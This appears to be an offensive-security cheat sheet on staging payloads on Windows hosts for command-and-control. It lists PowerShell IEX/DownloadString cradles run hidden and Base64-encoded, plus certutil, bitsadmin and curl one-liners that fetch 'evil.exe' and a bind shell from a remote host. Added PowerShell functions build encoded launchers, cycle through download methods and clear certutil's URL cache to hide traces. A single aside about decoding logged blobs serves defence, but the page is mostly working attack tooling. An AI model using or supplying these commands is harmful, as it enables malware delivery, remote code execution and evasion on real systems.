Windows remote file download
Downloading a remote file from the Windows command line to stage a payload and get the host to check in to C2.
# PowerShell
Download to disk. A relative output path is resolved against the process working directory (inherited from cmd here), not PowerShell's current location, so use an absolute path when the two differ:
powershell (new-object System.Net.WebClient).DownloadFile('http://192.168.1.1/evil.txt','evil.exe')
Fetch the script over HTTP and execute it directly in memory with Invoke-Expression (nothing is written to disk):
powershell -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.1.1/evil.txt'))"
Base64-encoding the command avoids quoting and escaping problems. PowerShell's -EncodedCommand expects the command as UTF-16LE bytes (what .NET calls the Unicode encoding) before Base64; encoding it as UTF-8 produces a blob that decodes to garbage on the target.
$command = "IEX ((New-Object Net.WebClient).DownloadString('http://192.168.1.1/evil.txt'))"
$bytes = [System.Text.Encoding]::Unicode.GetBytes($command)
$encoded = [Convert]::ToBase64String($bytes)
Write-Output $encoded
Run the Base64-encoded command directly with PowerShell, which sidesteps the escaping problem (-e and -enc are accepted abbreviations). Keep the encoded part short: cmd.exe limits a command line to 8191 characters, so put the real script on the HTTP server and only encode the download cradle:
powershell -nop -w hidden -EncodedCommand <the base64 printed above>
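As an added example (not code from the original page), the encoding step above wrapped in a function with a decoder beside it, so the one-liner can be round-trip checked before it is used on a target. The decoder is also what you reach for when a `-enc` blob turns up in a process-creation log. The URL is the page's placeholder; the script only encodes and decodes, it fetches nothing.

```powershell
# Added example: build and verify a -EncodedCommand payload (not from the original page).

function ConvertTo-EncodedCommand {
    param([Parameter(Mandatory)][string]$Command)
    # -EncodedCommand expects UTF-16LE ("Unicode" in .NET) bytes, then Base64.
    # UTF-8 is the classic mistake: powershell.exe decodes it to garbage.
    $bytes = [System.Text.Encoding]::Unicode.GetBytes($Command)
    [Convert]::ToBase64String($bytes)
}

function ConvertFrom-EncodedCommand {
    param([Parameter(Mandatory)][string]$Encoded)
    # Exact reverse; use it on blobs found in 4688 / Sysmon 1 command lines.
    [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Encoded))
}

# Placeholder URL from the page; replace with your own staging host.
$command = "IEX ((New-Object Net.WebClient).DownloadString('http://192.168.1.1/evil.txt'))"
$encoded = ConvertTo-EncodedCommand -Command $command

# Round-trip check: a wrong encoding fails here instead of on the target.
if ((ConvertFrom-EncodedCommand -Encoded $encoded) -ne $command) {
    throw "round-trip mismatch: encoded payload does not decode to the command"
}

# The launcher line to paste into cmd.exe. cmd caps a command line at 8191 chars,
# so keep the encoded part a short cradle and serve the real script over HTTP.
$launcher = "powershell -nop -w hidden -EncodedCommand $encoded"
Write-Output $launcher
```

If `$launcher` comes out longer than a few hundred characters, the thing being encoded is the script itself rather than a cradle; move it to the web server and encode only the `IEX`/`DownloadString` line.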
# certutil
Download to the current directory. -f overwrites an existing file; -split writes the fetched content to the named file. certutil also keeps a copy of every fetched URL in the user's CryptnetUrlCache, which you can clear afterwards with certutil -urlcache * delete:
certutil -urlcache -split -f http://192.168.1.1/bind_shell_x64.exe bind_shell_x64.exe
# bitsadmin
bitsadmin is deprecated but still present. The local path must be absolute (a bare filename fails), hence %cd% from a cmd prompt:
bitsadmin /transfer jobName /download /priority high http://192.168.1.1/evil.exe %cd%\evil.exe
# curl(win10及以上)
curl.exe ships with Windows 10 1803 and later, so it is rarely available on older systems. From a PowerShell prompt call curl.exe explicitly, because plain curl there is an alias for Invoke-WebRequest with different options:
curl -o bind_shell_x64.exe http://192.168.1.1/bind_shell_x64.exe
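As an added example (not from the original page), a PowerShell function that tries the methods on this page in order, stops at the first one that actually produces a file, verifies its SHA-256 before anything gets executed, and cleans up the certutil URL cache. It covers the caveats noted above: absolute paths for bitsadmin and WebClient, curl.exe rather than the alias, and a zero-byte file from a failed fetch. The URL and the expected hash are placeholders you supply; no real payload is implied.

```powershell
# Added example: fallback download with integrity check (not from the original page).

function Get-StagedFile {
    param(
        [Parameter(Mandatory)][string]$Url,
        [Parameter(Mandatory)][string]$OutFile,
        [string]$ExpectedSha256   # SHA-256 of the file as served; empty skips the check
    )
    # Absolute path: bitsadmin rejects relative paths, and WebClient resolves relative
    # paths against the process working directory, not PowerShell's current location.
    $path = Join-Path (Get-Location).Path $OutFile

    $methods = [ordered]@{
        'WebClient' = { (New-Object System.Net.WebClient).DownloadFile($Url, $path) }
        'certutil'  = { & certutil.exe -urlcache -split -f $Url $path | Out-Null }
        'bitsadmin' = { & bitsadmin.exe /transfer stage /download /priority high $Url $path | Out-Null }
        'curl'      = { & curl.exe -s -f -o $path $Url }   # curl.exe, not the Invoke-WebRequest alias
    }

    $used = $null
    foreach ($name in $methods.Keys) {
        try {
            & $methods[$name]
        } catch {
            # Missing binary (old OS without curl.exe) or a .NET exception: try the next one.
            continue
        }
        # Native tools do not throw on HTTP errors; judge by the file that was (not) written.
        if ((Test-Path $path) -and (Get-Item $path).Length -gt 0) { $used = $name; break }
        Remove-Item $path -ErrorAction SilentlyContinue   # drop a zero-byte leftover
    }
    if (-not $used) { throw "all download methods failed for $Url" }

    if ($ExpectedSha256) {
        # Get-FileHash needs PowerShell 4.0+; on older hosts use: certutil -hashfile $path SHA256
        $actual = (Get-FileHash -Path $path -Algorithm SHA256).Hash
        if ($actual -ne $ExpectedSha256) {
            Remove-Item $path
            throw "hash mismatch via ${used}: got $actual"
        }
    }

    # certutil keeps a copy of every fetched URL in the CryptnetUrlCache; remove that entry.
    if ($used -eq 'certutil') { & certutil.exe -urlcache $Url delete | Out-Null }

    [pscustomobject]@{ Method = $used; Path = $path }
}

# Usage (placeholder URL and hash from your own staging server):
# Get-StagedFile -Url 'http://192.168.1.1/bind_shell_x64.exe' -OutFile 'bind_shell_x64.exe' `
#     -ExpectedSha256 '<sha256 of the served file>'
```

The hash check matters more than it looks: a captive portal, a proxy error page, or a defender swapping the file on the wire all produce a non-empty file that is not your payload, and without the check the next step runs whatever came back.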
Last updated: 2025/10/04, 14:38:57